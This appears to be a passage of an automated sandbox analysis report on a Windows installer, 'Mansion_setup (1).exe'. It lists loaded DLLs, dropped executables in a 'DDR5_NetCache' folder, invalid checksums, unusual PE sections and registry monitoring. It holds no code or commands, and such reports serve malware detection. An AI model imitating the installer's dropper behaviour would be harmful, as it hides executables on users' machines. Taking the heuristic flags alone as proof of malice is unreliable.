Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: kbdus.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: opengl32.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: version.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: glu32.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\games\DDR5_NetCache\qtZint.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Section loaded: mpr.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Section loaded: mfplat.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Section loaded: rtworkq.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Media Player\wmlaunch.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: dhcpcsvc.dll

Source: C:\Users\user\Desktop\Mansion_setup (1).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Uses Microsoft Silverlight

Source: C:\games\DDR5_NetCache\qtZint.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

PE / OLE file has a valid certificate

Source: Mansion_setup (1).exe

Static PE information: certificate valid

Submission file is bigger than most known malware samples

Source: Mansion_setup (1).exe

Static file information: File size 65780936 > 1048576

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Mansion_setup (1).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

PE file contains an invalid checksum

Source: elevate.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x225bc
Source: libEGL.dll0.5.dr	Static PE information: real checksum: 0x0 should be: 0x7f49d
Source: libEGL.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x7f49d
Source: vulkan-1.dll0.5.dr	Static PE information: real checksum: 0x0 should be: 0xe8fc5
Source: nsis7z.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x7611e
Source: vk_swiftshader.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x506829
Source: vk_swiftshader.dll0.5.dr	Static PE information: real checksum: 0x0 should be: 0x506829
Source: libGLESv2.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x7202c9
Source: System.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0xe5c7
Source: libGLESv2.dll0.5.dr	Static PE information: real checksum: 0x0 should be: 0x7202c9
Source: ExtractJPEGcmd.exe.9.dr	Static PE information: real checksum: 0x6e862a should be: 0x6e2977
Source: vulkan-1.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0xe8fc5
Source: ffmpeg.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x2c5e0e
Source: ffmpeg.dll0.5.dr	Static PE information: real checksum: 0x0 should be: 0x2c5e0e

PE file contains sections with non-standard names

Source: ffmpeg.dll.5.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll.5.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll.5.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll.5.dr	Static PE information: section name: _RDATA
Source: libEGL.dll.5.dr	Static PE information: section name: .00cfg
Source: libEGL.dll.5.dr	Static PE information: section name: .gxfg
Source: libEGL.dll.5.dr	Static PE information: section name: .retplne
Source: libEGL.dll.5.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll.5.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll.5.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll.5.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll.5.dr	Static PE information: section name: _RDATA
Source: Mansion.exe.5.dr	Static PE information: section name: .00cfg
Source: Mansion.exe.5.dr	Static PE information: section name: .gxfg
Source: Mansion.exe.5.dr	Static PE information: section name: .retplne
Source: Mansion.exe.5.dr	Static PE information: section name: .rodata
Source: Mansion.exe.5.dr	Static PE information: section name: CPADinfo
Source: Mansion.exe.5.dr	Static PE information: section name: LZMADEC
Source: Mansion.exe.5.dr	Static PE information: section name: _RDATA
Source: Mansion.exe.5.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll.5.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.5.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.5.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll.5.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll.5.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll.5.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.5.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.5.dr	Static PE information: section name: _RDATA
Source: ffmpeg.dll0.5.dr	Static PE information: section name: .00cfg
Source: ffmpeg.dll0.5.dr	Static PE information: section name: .gxfg
Source: ffmpeg.dll0.5.dr	Static PE information: section name: .retplne
Source: ffmpeg.dll0.5.dr	Static PE information: section name: _RDATA
Source: libEGL.dll0.5.dr	Static PE information: section name: .00cfg
Source: libEGL.dll0.5.dr	Static PE information: section name: .gxfg
Source: libEGL.dll0.5.dr	Static PE information: section name: .retplne
Source: libEGL.dll0.5.dr	Static PE information: section name: _RDATA
Source: libGLESv2.dll0.5.dr	Static PE information: section name: .00cfg
Source: libGLESv2.dll0.5.dr	Static PE information: section name: .gxfg
Source: libGLESv2.dll0.5.dr	Static PE information: section name: .retplne
Source: libGLESv2.dll0.5.dr	Static PE information: section name: _RDATA
Source: Mansion.exe0.5.dr	Static PE information: section name: .00cfg
Source: Mansion.exe0.5.dr	Static PE information: section name: .gxfg
Source: Mansion.exe0.5.dr	Static PE information: section name: .retplne
Source: Mansion.exe0.5.dr	Static PE information: section name: .rodata
Source: Mansion.exe0.5.dr	Static PE information: section name: CPADinfo
Source: Mansion.exe0.5.dr	Static PE information: section name: LZMADEC
Source: Mansion.exe0.5.dr	Static PE information: section name: _RDATA
Source: Mansion.exe0.5.dr	Static PE information: section name: malloc_h
Source: vk_swiftshader.dll0.5.dr	Static PE information: section name: .00cfg
Source: vk_swiftshader.dll0.5.dr	Static PE information: section name: .gxfg
Source: vk_swiftshader.dll0.5.dr	Static PE information: section name: .retplne
Source: vk_swiftshader.dll0.5.dr	Static PE information: section name: _RDATA
Source: vulkan-1.dll0.5.dr	Static PE information: section name: .00cfg
Source: vulkan-1.dll0.5.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll0.5.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll0.5.dr	Static PE information: section name: _RDATA
Source: qtZint.exe.9.dr	Static PE information: section name: .qtmetad
Source: qtZint.exe.9.dr	Static PE information: section name: _RDATA
Source: qtZint.exe.9.dr	Static PE information: section name: .qtmimed

Persistence and Installation Behavior

Drops PE files

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\nsis7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\libEGL.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\libGLESv2.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\Mansion.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\ffmpeg.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	File created: C:\games\DDR5_NetCache\qtZint.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\vk_swiftshader.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\d3dcompiler_47.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\7z-out\resources\elevate.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	File created: C:\games\DDR5_NetCache\ExtractJPEGcmd.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\nsq7257.tmp\System.dll	Jump to dropped file

Creates license or readme file

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user~1\AppData\Local\Temp\nsq7257.tmp\7z-out\LICENSE.electron.txt			Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	File created: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\LICENSE.electron.txt			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe

Registry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Spelling

Jump to behavior

Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Mansion_setup (1).exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2sBmKhYkAMuETMmMTCVRNvTLAaj\Mansion.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
